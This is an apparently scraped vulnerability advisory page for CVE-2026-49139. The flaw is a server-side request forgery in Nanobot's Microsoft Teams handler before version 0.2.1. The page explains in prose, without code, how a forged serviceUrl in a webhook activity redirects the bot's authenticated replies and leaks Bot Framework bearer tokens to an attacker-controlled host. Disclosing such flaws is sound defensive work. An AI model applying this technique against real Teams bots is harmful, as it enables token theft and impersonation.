CVE-2026-49139
Server-Side Request Forgery in Nanobot Prior to 0.2.1
Publication date: 2026-06-01
Last updated on: 2026-06-01
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Nanobot versions prior to 0.2.1 and involves a server-side request forgery (SSRF) issue in the Microsoft Teams channel handler.
Remote attackers can exploit this by sending a forged activity containing an attacker-controlled serviceUrl value to the Teams webhook.
This allows attackers to poison the stored conversation reference, causing the bot to send subsequent replies with Authorization header requests that include Bot Framework bearer tokens to an attacker-controlled host.
How can this vulnerability impact me? :
The vulnerability can lead to unauthorized exfiltration of Bot Framework bearer tokens.
Attackers gaining these tokens could impersonate the bot or access sensitive communications, potentially leading to further attacks or data breaches.